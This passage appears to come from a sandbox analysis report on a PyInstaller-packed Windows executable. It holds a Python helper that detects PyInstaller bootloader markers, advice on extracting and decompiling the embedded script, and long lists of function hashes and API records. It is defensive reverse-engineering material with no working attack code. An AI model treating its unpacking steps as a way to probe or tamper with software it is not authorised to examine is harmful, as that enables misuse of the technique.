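    strings: list = field(default_factory=list)   # String ID split on '$'


def parse_records(text):
    """One record per 'Memory Dump Source' header.  Joe Sandbox joins the
    strings referenced by a function with '$', so String ID is split on it."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "Memory Dump Source":
            current = FunctionRecord()
            records.append(current)
            continue
        m = BULLET.match(line) if current is not None else None
        if not m:
            continue
        attr = FIELD_MAP.get(m.group("key").strip())
        if attr is None:
            continue
        value = m.group("value").strip()
        setattr(current, attr, value)
        if attr == "string_id" and value:
            current.strings = value.split("$")
    return records


def pyinstaller_indicators(records):
    """Map each marker to the set of Opcode IDs whose strings contain it."""
    hits = {}
    for rec in records:
        for s in rec.strings:
            for marker in PYINSTALLER_MARKERS:
                if marker in s:
                    hits.setdefault(marker, set()).add(rec.opcode_id)
    return hits


def python_c_api_symbols(records):
    """Python C-API names the bootloader resolves with GetProcAddress, read
    back from its own 'Failed to get address for X' error strings."""
    names = {s[len(GETADDR_PREFIX):] for rec in records
             for s in rec.strings if s.startswith(GETADDR_PREFIX)}
    return sorted(names)


def looks_like_pyinstaller(records, min_markers=2):
    """Require two independent bootloader markers before calling it PyInstaller."""
    return len(pyinstaller_indicators(records)) >= min_markers


# Constructed excerpt of the records on this page (String IDs shortened).
SAMPLE_REPORT = """\
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
Similarity
• API ID: AddressProc
• String ID: Failed to get address for PyConfig_Read$Failed to get address for PyEval_EvalCode$GetProcAddress$PyConfig_Read$PyEval_EvalCode
• Opcode ID: 75da080be946a2cd8ba8e1b454c823e383fc18c1915e405073f2aaa9ec7d6da3
Memory Dump Source
Similarity
• API ID: MessageSend$Window$Create
• String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
• Opcode ID: bd898f0db48e12eacbe359e455c65c9f86494896ecfc44a00e7b3fd1842e94f6
Memory Dump Source
Similarity
• API ID: ErrorLastMessage$ByteCharFormatMultiWide
• String ID: Failed to encode wchar_t as UTF-8.$FormatMessageW$PyInstallem: pyi_win32_utils_to_utf8 failed.$WideCharToMultiByte
• Opcode ID: bc7b3eaa85e9f8c684efbfb0abf8c740a9d6d3509a191f947940c97d6b2913ba
Memory Dump Source
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• Opcode ID: 6d56955c9c81706069cc343df1e629214711a864640335e79fef0628d15a0890
"""

if __name__ == "__main__":
    recs = parse_records(SAMPLE_REPORT)
    print("PyInstaller bundle:", looks_like_pyinstaller(recs))
    for marker, ids in pyinstaller_indicators(recs).items():
        print(f"  {marker!r} in functions {sorted(ids)}")
    print("C-API symbols resolved:", python_c_api_symbols(recs))
```

Once the bootloader is confirmed, the productive next step is to carve the embedded archive out of the executable with a PyInstaller extractor such as pyinstxtractor and decompile the entry script; the bootloader functions listed here are stock code and will match any other PyInstaller build of the same version.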

APIs
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: bd7f2f980a7da6926a80c9d6d5668f96453f81ee33dc92f3020e8ba00438ebde
• Instruction ID: 42d73d99ffcc556996292c74cde7a621dab793e68da13423882a9cdb90555544
• Opcode Fuzzy Hash: bd7f2f980a7da6926a80c9d6d5668f96453f81ee33dc92f3020e8ba00438ebde
• Instruction Fuzzy Hash: A0315CB2A18B818AFB609F61E8503ED73A5FB84744F44443ADA4E87B98DF3CD648D714
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
• String ID:
• API String ID: 1239891234-0
• Opcode ID: 7216508a44e270dbe74d940196730f6ae427e6a408c85f6a39dc9bb5e9d9eeec
• Instruction ID: 41c803b9b8acda0b8a184d4f0a67766434d6197ae653dfecd00f41b4ad866f37
• Opcode Fuzzy Hash: 7216508a44e270dbe74d940196730f6ae427e6a408c85f6a39dc9bb5e9d9eeec
• Instruction Fuzzy Hash: 9631A376A18F8186EB60CF25E8403AE73A0FB89794F500135EA9D83B98DF3CD645CB00
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: FileFindFirst_invalid_parameter_noinfo
• String ID:
• API String ID: 2227656907-0
• Opcode ID: 5b08ba71cf53a859679ca3725f02dc9f6ff5d13e2ee69dd84dd7cfc9c3e683b4
• Instruction ID: 8295b1789e93fcba3bacf41aef997bf683be3546b8d3667fda53613f4017eb65
• Opcode Fuzzy Hash: 5b08ba71cf53a859679ca3725f02dc9f6ff5d13e2ee69dd84dd7cfc9c3e683b4
• Instruction Fuzzy Hash: 93B1B362F1C69281FB61DB22E4105BA63E1EB58BE4F445131EA6D87BD5DF3CE845E300
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: a5550d9be1c0b415d16e930586c9cd762ba62d5a2847c086dd54dcf240d88082
• Instruction ID: b78b2a23bda499100344071de63c9b188794313315b3be1a8285ce49ccf97392
• Opcode Fuzzy Hash: a5550d9be1c0b415d16e930586c9cd762ba62d5a2847c086dd54dcf240d88082
• Instruction Fuzzy Hash: FD117C76F14F058AFB00CF60E8442B933A4FB58758F040E31DA6D867A8DF78D1A89380
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: memcpy_s
• String ID:
• API String ID: 1502251526-0
• Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
• Instruction ID: 4b4ce53c16402983e4f82a6e9f4ee4be48d67e74a5d641780ccb3b003013bed3
• Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
• Instruction Fuzzy Hash: 1FC1D172B1C28687E724CF59A04866AB7E1F784B84F458135DB6E97B44DF3DE801CB40
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: ExceptionRaise_clrfp
• String ID:
• API String ID: 15204871-0
• Opcode ID: 573902758330cef39c5d4c46541062d655f0f5807630df07073b8173e5cf79ed
• Instruction ID: 4774109e8ccbb575590eb04b8557856a626c50f878bd9c199f968fc8fdf22067
• Opcode Fuzzy Hash: 573902758330cef39c5d4c46541062d655f0f5807630df07073b8173e5cf79ed
• Instruction Fuzzy Hash: 1FB12A77A04B898BEB15CF29C8863687BE0F784F88F158926DA6D877A4CF39D451D700
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
• Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: bee6a5b65c38c73ae96c9afab633c03bfb21d8601624e0d1433da97daea3c534
• Instruction ID: 54ca9fe8d91c01a753bd877e8a128ce20ab3db728754ad01771aa78280ca6358
• Opcode Fuzzy Hash: bee6a5b65c38c73ae96c9afab633c03bfb21d8601624e0d1433da97daea3c534
• Instruction Fuzzy Hash: 20F04F72E186858AF7A08F64F48976A7390FF84728F044335D66D467E8DF3CE458AB00
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
Similarity
• API ID:
• String ID: $
• API String ID: 0-227171996
• Opcode ID: eb253334f3b2123b75c41e14b25340356869d8081e136acde1c9d78a5cce5154
• Instruction ID: 47e51bfc7d67ad501a46a349a3a23644e71de0a3bf79f48f8f9c775d5687e1b5
• Opcode Fuzzy Hash: eb253334f3b2123b75c41e14b25340356869d8081e136acde1c9d78a5cce5154
• Instruction Fuzzy Hash: E9E1A033E0874682FB688A29815017D33A0FF45B58F247235DA4E87794DF3AEE51E762
Uniqueness

Uniqueness Score: -1.00%

Strings
Similarity
• API ID:
• String ID: e+000$gfff
• API String ID: 0-3030954782
• Opcode ID: 0b170b41c43961ebac1ef0d609b29da04a4ec4d2605dd63797325ec0b21ead84
• Instruction ID: d4ee2b352a3731fe9f8c9ecbec67bf7888e19ead4973ad921c0ddf401b715e7a
• Opcode Fuzzy Hash: 0b170b41c43961ebac1ef0d609b29da04a4ec4d2605dd63797325ec0b21ead84
• Instruction Fuzzy Hash: D5515563F187C586F7248E35A800769BB91F744B94F48A231CBAC8BBC5DE3DE9459B10
Uniqueness

Uniqueness Score: -1.00%

Strings
Similarity
• API ID:
• String ID: gfffffff
• API String ID: 0-1523873471
• Opcode ID: 7688a012653018b8f058c6a29e93a84e120e5f9f036dc2bf3f255d77f4e3d626
• Instruction ID: f0e0af78a82bd4835c32114ac7120ab4f79aa834208c5d8058f09df385747f82
• Opcode Fuzzy Hash: 7688a012653018b8f058c6a29e93a84e120e5f9f036dc2bf3f255d77f4e3d626
• Instruction Fuzzy Hash: 86A13573E097C686FB21CF26E4007A97B91AB54B84F04A131DE8D87781DE3DEA15E711
Uniqueness

Uniqueness Score: -1.00%

Strings
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: TMP
• API String ID: 3215553584-3125297090
• Opcode ID: 3fc9d058db2755ff66f7b9c9da586ed4d63d2550896a26aa3553a0b1b8628658
• Instruction ID: ad81ed58e8920062f225d419749c934eadf864b9e0e35d015cf0a4985eac692b
• Opcode Fuzzy Hash: 3fc9d058db2755ff66f7b9c9da586ed4d63d2550896a26aa3553a0b1b8628658
• Instruction Fuzzy Hash: 1451C113F0874282FB64AB2769111BA62D1EF44BD4F486474DE0ED77D2EE3CEE126690
Uniqueness

Uniqueness Score: -1.00%

APIs
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
• Opcode ID: fb5afa7e83816f87ad3bdb1e5bd3057140fa0dcd1efc4ce90fdbad9c247c2568
• Instruction ID: 4ce5712c6b6dbd44962a8a6746c8a075f4d8998e014a72b1427c9c5eeae5b667
• Opcode Fuzzy Hash: fb5afa7e83816f87ad3bdb1e5bd3057140fa0dcd1efc4ce90fdbad9c247c2568
• Instruction Fuzzy Hash: B4B09220E0BA46C6EB482B216C8621422A47F48B00F994038C50D81320DE3C20B56704
Uniqueness

Uniqueness Score: -1.00%

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0d3f78641df24769d705b0134685206bc5f9ca78e59f6fddb9ec423e4bd4151a
• Instruction ID: 6807bfbcf9d1b3dbfa4a86d5b3b5761e45d78324baca54b875ffb7e1860bfbd5
• Opcode Fuzzy Hash: 0d3f78641df24769d705b0134685206bc5f9ca78e59f6fddb9ec423e4bd4151a
• Instruction Fuzzy Hash: EED1CD63E0874686FB688A29805027D3BA0EF45B58F147235CE0E87795CF3DEE45E762
Uniqueness

Uniqueness Score: -1.00%

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 147d92bf8c69cf1b856be138069e08edad3a532e6dbae6759c0ef437899157f5
• Instruction ID: 90d3dd22d4dd47ded0570b614efbd023f95c2e459cff50930eafd0dedbeb460d
• Opcode Fuzzy Hash: 147d92bf8c69cf1b856be138069e08edad3a532e6dbae6759c0ef437899157f5
• Instruction Fuzzy Hash: 36C117326142F04BE798EB29E45947A33E5F7A9309BD5403BEB874B785CA3CE414E750
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 14559cf246afd361d58dafe0d2584ab9f073efdfb6141b8081588b00c2cbc866
                                                                                                                                                                      • Instruction ID: 1d675dcf0ddc01f28f6b2b74064bf63ad6fb65f187472d5a4e945e7481a7752f
                                                                                                                                                                      • Opcode Fuzzy Hash: 14559cf246afd361d58dafe0d2584ab9f073efdfb6141b8081588b00c2cbc866
                                                                                                                                                                      • Instruction Fuzzy Hash: 2CB15A73D0C79585FB658F29C05022C3BA0E749B48F282136DB4E87395CF39DA46E761
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: de4e625d11443468839699302f6427928d225114e5d5e833cf81a80f5f4de726
                                                                                                                                                                      • Instruction ID: d6546b8a17b1644ca68237b555d08467a384cfe9cd1301d401357f0d16d4e531
                                                                                                                                                                      • Opcode Fuzzy Hash: de4e625d11443468839699302f6427928d225114e5d5e833cf81a80f5f4de726
                                                                                                                                                                      • Instruction Fuzzy Hash: 46811773E0D78186FB74CB19948037A7A91FB45794F005239DA8E83B95DF3DEA10AB10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 93e1b572973ddb4749f990ebe4e4193ccfe505291fa828401f493f174f614033
                                                                                                                                                                      • Instruction ID: ce941373c8a7b5733c91a8611d9480053ccd0bbedfc5c745708fba7cb01eb27a
                                                                                                                                                                      • Opcode Fuzzy Hash: 93e1b572973ddb4749f990ebe4e4193ccfe505291fa828401f493f174f614033
                                                                                                                                                                      • Instruction Fuzzy Hash: 7061CFA3E5C29246FB648A28C55077D67E1AF60760F184239EA7DC7BD1EE7DEC40A700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 52a02fcdcf92c0a2c9a35e836e6333fb64ecc70c5ed9b2f6572b25d33bf7c64b
                                                                                                                                                                      • Instruction ID: 736101e96743d39da94b772bce0e1c2697918562a65dd367c75184fa4e9f3681
                                                                                                                                                                      • Opcode Fuzzy Hash: 52a02fcdcf92c0a2c9a35e836e6333fb64ecc70c5ed9b2f6572b25d33bf7c64b
                                                                                                                                                                      • Instruction Fuzzy Hash: 52517077E1CB5182F7648B29C04027833A0EB58B58F246131CE8D977A5CF3AEE52EB50
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a4ee5e20bab15de11e4dd18ca9e8a43eac167d7c0a0227fcc00f18b96ee599bc
                                                                                                                                                                      • Instruction ID: ddd39488aea08d0a5f9f039370be1022ebb0bd71fc98c561d5c56d7c27fe5198
                                                                                                                                                                      • Opcode Fuzzy Hash: a4ee5e20bab15de11e4dd18ca9e8a43eac167d7c0a0227fcc00f18b96ee599bc
                                                                                                                                                                      • Instruction Fuzzy Hash: 66519337E1875282FB248B29D040239B7A1EB44B68F246131CE4D977A4DF3AEE53D790
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a148da24f8728c4afbbb5c35b1c62c1eac07cb27a590c1aedb906e23ad299329
                                                                                                                                                                      • Instruction ID: 4e3bc517474c2870a9923bbbd2d9bd74d3656f1db98a0393b72905a2261df8ad
                                                                                                                                                                      • Opcode Fuzzy Hash: a148da24f8728c4afbbb5c35b1c62c1eac07cb27a590c1aedb906e23ad299329
                                                                                                                                                                      • Instruction Fuzzy Hash: FE519437E1875286F7248B29C04063877A1EB99B68F246231DE4D97794CF3AEE43D790
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044509527.00007FF6313FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF63140E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044544330.00007FF631410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.2044613576.00007FF631412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff6313d0000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1952aa752d02783d999143113e74aeee2381d9ff93f559de6217d8abf59dcb14
                                                                                                                                                                      • Instruction ID: 36b13ad82d0cb061a67c51e789d6d1fc962653723858651a5f2eba1655919693
                                                                                                                                                                      • Opcode Fuzzy Hash: 1952aa752d02783d999143113e74aeee2381d9ff93f559de6217d8abf59dcb14
                                                                                                                                                                      • Instruction Fuzzy Hash: E7518D37E1875186FB248B29C040679B7A1EB48F58F246131CE4D97794CF3AEE52E790
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.2044428569.00007FF6313D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Memory Dump Source
• Source File: 00000000.00000002.2044469309.00007FF6313D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6313D0000, based on PE: true
Similarity
• API ID: BoundaryDeleteDescriptorErrorLast
• API String ID: 2050971199-0
Similarity
• API ID: AddressProc
